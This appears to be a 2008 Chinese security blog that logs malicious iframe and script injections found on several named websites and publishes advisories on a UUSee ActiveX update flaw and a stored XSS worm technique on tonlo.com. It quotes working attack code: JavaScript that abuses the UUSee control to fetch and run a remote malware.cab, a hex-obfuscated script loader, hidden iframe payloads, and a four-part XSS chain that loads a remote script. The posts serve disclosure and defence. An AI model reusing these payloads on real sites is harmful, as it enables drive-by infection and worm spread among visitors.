大草原信息网(hXXp://qqnw.gov.cn/wxpd)被插入恶意代码:
/*信息来源:知道安全*/
</iframe>www.foafaU.info/ms30.htm?823 wIdth=1 naMe=’4022′ height=1></ifraMe>aa.llsging.com/ww/new05.hTm?075 wIdth=1 name=’4022′ height=1></ifrAme>
</iframe>www.foafau.info/ms30.htm?823 wIdth=1 naMe=’7547′ height=1></iFrame>
aaa.77xxmm.cn/new858.Htm?075 width=0 name=’4362′ heighT=0></iframe>
<iframe width=0 height=0>aaa.1l1l1l.com/error/404.hTml Width=0 name=’2851′ height=0></ifraMe>
Popularity: 5% [?]
网站挂马记录 GreySign 18 Jun 2008 No Comments
发布日期:
最后更新日期:
关于UUSee网络电视:UUSee网络电视2008,是悠视网打造的一款全新网络电视收看软件,用户使用这款软件可以免费收看500多路新颖频道,共计1000多个精彩节目。
受影响版本:UUSee网络电视2008 4.0.0.32 (UUUpgrade.ocx 3.0.2.12)
描述:
近期知道安全应急团队捕获到利用UUsee网络电视的漏洞进行攻击的网页木马在互联网传播。实际上UUsee网马在今年一月已经开始流传,直到近期开始被传播。由于UUsee的升级控件(Clsid:{2CACD7BB-1C59-4BBB-8E81-6E83F82C813B}[UUUpgrade.ocx 3.0.2.12])在进行升级的时候没有对升级文件进行验证,所以可以通过构造恶意虚假的升级文件让UUsee下载特定的恶意程序并且运行。
部分代码如下:
try{var g; var storm=new ActiveXObject(”UUUPGRADE.UUUpgradeCtrl.1″);} catch(g){}; finally{if(g!=”[object Error]”){ var url=”http://***“; storm=(document.createElement(”object”)); ActivePerl=”-1C59-4BBB-8E8″; getSpraySlide=”1-6E83F82C813B”; helloworld2Address=”clsid:2CACD7BB”; storm.setAttribute(”classid”,helloworld2Address+ActivePerl+getSpraySlide) storm[”Update”](”\Program Files\Common Files\uusee\” ,url+”UU.ini”,”",1)}}
这段代码通过修改访问者的UU.ini,将UU.ini里的升级URL指向恶意文件来进行攻击,以下为UU.ini的内容:
[Global]
TotalVersion=5.4.15.81
SubPath=UUPlayer_2008
force=2
[Add]
UUSeeMediaCenter.exe=9.0.0.12
[Kill]
[Remove]
[UUSeeMediaCenter.exe]
Url=http://***/malware.cab
subpath=
reg=1
type=1
另外,网络上最早出现UUsee网马生成器的截图:
安装365门神(WESEC)软件,对IE浏览器在打开网站的时候进行保护,拦截来自网络带有恶意代码的网页攻击。使用帮助和下载:http://www.scanw.com/
日前悠视网已发布了UUSee网络电视2008最新的正式版本,该版本已经解决因ActiveX控件带来的0day漏洞问题,请用户立即到download.uusee.com下载最新版本。
Popularity: 17% [?]
漏洞公告 GreySign 16 Jun 2008 No Comments
中国五金机电网(hXXp://www.allchinahardware.com)被插入恶意代码:
[frame]http://www.gdsax.cn/s1.htm?hY
[frame]http://aaa.1l1l1l.com/qq.htm
[frame]http://www.gdSax.cn/S1.htm?hy
[frame]http://aaa.1l1l1l.Com/qq.htm
[frame]http://www.gdsax.cn/s1.htm?hy
[frame]http://aaa.1l1l1l.com/qq.htm
[frame]http://aaa.1l1l1l.Com/qq.htm
[frame]http://www.gdsax.cn/s1.htm?hy
[frame]http://AAA.1l1l1l.com/qq.htm
[frame]http://www.gdsaX.cn/s1.htm?hy
[frame]http://aaa.1l1l1l.com/qq.htm
[frame]http://www.gdsax.cN/s1.htm?hy
[script]http://www.mainone.com/searchbar/search9.js
[frame]http://www.souyes.com/include.asp?type=2
[script]http://www.jingleinet.com/count/mystat.asp?siteid=3
[frame]http://www.gdsax.cn/s1.htm?hy
[frame]http://aaa.1L1L1L.com/qq.htm
[frame]http://aaa.1l1l1l.com/QQ.htm
Popularity: 5% [?]
网站挂马记录 GreySign 16 Jun 2008 No Comments
漏洞说明: 同楼网tonlo.com是一个类似于校内网的SNS网络,发一篇文章时,在文章列表中输出的标题过滤不严导致XSS Trap的出现,即使标题的字符数上限为30,我们还是有办法构造出邪恶的XSS Worm。
漏洞来源:知道安全(http://www.scanw.com/blog/)
漏洞分析:发一篇文章时,标题的字符数上限为30,如下图:
z
不过在文章列表中,标题就跨了(如下图,其它状态不跨)。看来这个SNS网络没对输入的字符进行有效过滤,而单单对输出进行过滤。30个字符限制能做什么呢?假如仅为了证明有XSS漏洞,那就简单一句</a><img src= onerror=alert()>。可如果想爆发Worm,那该怎么办?
我们可以使用拆分跨站法连续发表四篇文章,如下:
标题一:<script>o=’<script src=’;/*
标题二:*/o+=’http://www.0×37.co’;/*
标题三:*/o+=’m/tl.js><\/script>’;/*
标题四:*/document.write(o)</script>
/**/之内的字符自动被注释掉,于是<script></script>标签内的脚本将顺利执行。最终的效果如下:
<h1><a href=”show.shtml?logsNumber=25748″><script>o=’<script src=’;/*</a></h1>
<div>……
<h1><a href=”show.shtml?logsNumber=25747″>*/o+=’http://www.0×37.co’;/*</a></h1>
<div>……
<h1><a href=”show.shtml?logsNumber=25746″>*/o+=’m/tl.js><\/script>’;/*</a></h1>
<div>……
<h1><a href=”show.shtml?logsNumber=25745″>*/document.write(o)</script></a></h1>
据我的分析,这个SNS网络通过这个方法来构造XSS Trap并传播Worm是一件很容易的事。因为在“最新日志”列表中将会显示全站所有用户的最新日志。也就是说我构造的XSS Trap可以被其他验证用户轻易看到。
Popularity: 11% [?]
Web2.0 Security Cos 15 Jun 2008 No Comments
奉化电脑耗材网(hXXp://www.163fh.com)被插入恶意代码:
[frame]http://www.gdSax.cn/S1.htm?hy
[frame]http://aaa.1l1l1l.Com/qq.htm
[frame]http://aaa.1l1l1l.com/qq.htm
[frame]http://www.gdsax.cn/s1.htm?hy
[frame]http://AAA.1l1l1l.com/qq.htm
[script]http://www.163fh.com/floater.js
[frame]http://www.gdsax.cn/s1.htm?hy
[frame]http://www.gdsaX.cn/s1.htm?hy
[frame]http://aaa.1l1l1l.com/qq.htm
[frame]http://www.gdsax.cn/s1.htM?hy
[frame]http://aaa.1L1L1L.com/qq.htm
Popularity: 9% [?]
网站挂马记录 GreySign 15 Jun 2008 No Comments
上海金肯电子仪器有限公司(hXXp://www.85117.com/)被插入恶意代码: [frame]http://www.Vnet-1.net/s1.htm?hy
[frame]http://aaa.1l1l1l.com/qq.htm
[frame]http://www.gdSax.cn/S1.htm?hy
[frame]http://aaa.1l1l1l.coM/qq.htM
Popularity: 5% [?]
网站挂马记录 GreySign 14 Jun 2008 No Comments
河南鸿远印务有限公司(hXXp://www.hyysgf.com/)被插入恶意代码:
hXXp://aa.llsging.com/ww/new05.hTm?075
Popularity: 5% [?]
网站挂马记录 GreySign 13 Jun 2008 No Comments
深圳天之彩印刷有限公司(hXXp://www.tzcprint.com/)被插入恶意代码:
[wide]http://www.tzcprint.com/
[script]http://ccon.ezua.com/click.js?id=625478035&logo=3
[script]http://ccon.ezua.com/click.js?id=625478035&logo=3
[script]http://ccon.ezua.com/click.js?id=625478035&logo=3
[script]http://count10.51yes.com/click.aspx?id=105127778&logo=1
[script]http://ccon.ezua.com/click.js?id=625478035&logo=3
[script]http://ccon.ezua.com/click.js?id=625478035&logo=3
<script>document.writeln(”\x3c\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3d\x68\x74\x74\x70\x3a\x2f\x2f\x4f\x25\x36\x36\x25\x36\x36\x25\x34\x39\x25\x36\x33\x65\x25\x32\x45\x25\x34\x36\x25\x34\x31\x51\x25\x35\x33\x25\x36\x35\x25\x37\x32\x76\x2e\x25\x34\x33\x25\x36\x46\x25\x34\x44\x2f\x25\x34\x36\x25\x34\x31\x25\x35\x31\x25\x32\x45\x25\x36\x41\x25\x37\x33\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e”);</script>http://www.37db.cn/images/dis.htm width=0 height=0>
://www.foafau.info/ms30.htm?823 widTh=1 name=’1650′ height=1> ://aa.llsging.com/ww/new05.hTm?075 Width=1 name=’1650′ height=1>
://www.foafau.info/ms30.htm?823 wIdth=1 name=’8078′ hEight=1> ://aa.llsging.coM/ww/new05.htM?075 width=1 name=’8078′ HeigHt=1>
://aa.chaiNa-game.cN/reg.htm wiDth=1 nAme=’8195′ height=1> ://a5.llsging.com/ww/new05.htm?075 wIdth=1 naMe=’8195′ HeigHt=1>
http://www.37db.cn/images/dis.htm width=0 height=0>
http://www.37db.cn/images/dis.htm width=0 height=0>
://www.fOafau.infO/ms30.htm?823 width=1 naMe=’5436′ hEight=1> ://aa.llsgIng.com/ww/new05.htm?075 widtH=1 Name=’5436′ height=1>
://www.foafau.info/ms30.htm?823 widtH=1 name=’4038′ height=1> ://aa.llsging.com/ww/new05.hTm?075 wiDth=1 name=’4038′ height=1>
://aa.chaina-game.cn/reg.htm wiDth=1 name=’9171′ height=1> ://a5.llsgiNg.com/ww/New05.htm?075 widtH=1 name=’9171′ height=1>
://WWW.foafau.info/ms30.htm?823 widtH=1 name=’6293′ heiGht=1> http://aa.llsging.com/ww/new05.htm?075 width=1 naMe=’6293′ height=1>
://www.foafau.info/ms30.Htm?823 wiDth=1 namE=’6017′ hEight=1> ://aa.llsging.com/WW/neW05.htm?075 widtH=1 Name=’6017′ height=1>
://aa.chaina-game.cn/reg.htm width=1 name=’3654′ height=1> ://a5.llsging.coM/ww/new05.htM?075 widTh=1 name=’3654′ HeigHt=1>
Popularity: 5% [?]
网站挂马记录 GreySign 13 Jun 2008 No Comments
常州市武进区湟里鲸涛卫浴厂(hXXp://www.jingtaoweiyu.com)被插入恶意代码:
hXXp://www.dyyh.com.cn/ktm/k.js
Popularity: 5% [?]
网站挂马记录 GreySign 11 Jun 2008 No Comments
中国汽车配件网(hXXp://www.mmqp.com/Two_Html_File/2006112510149_.html)被插入恶意代码:
</iframe>www.foafaU.info/ms30.htm?823 wIdth=1 naMe=’4022′ height=1></ifraMe>aa.llsging.com/ww/new05.hTm?075 wIdth=1 name=’4022′ height=1></ifrAme>
</iframe>www.foafau.info/ms30.htm?823 wIdth=1 naMe=’7547′ height=1></iFrame>
aaa.77xxmm.cn/new858.Htm?075 width=0 name=’4362′ heighT=0></iframe>
xxx.llxxCx.Cn/pv.htm width=0 nAme=’1774′ hEight=0></iframE>aa.llsging.com/ww/new05.htm?075 widtH=1 nAme=’1774′ height=1></ifRame>
aa.llsging.com/ww/new05.htm?075 width=1 name=’5912′ height=1></ifrAme>
aaa.77xxmm.cn/new858.htm?075 width=0 name=’1938′ height=0></iFrame>
<iframe width=0 height=0>aaa.1l1l1l.com/error/404.hTml Width=0 name=’2851′ height=0></ifraMe>
Popularity: 5% [?]
网站挂马记录 GreySign 10 Jun 2008 No Comments
Copyright © 2010 知道创宇
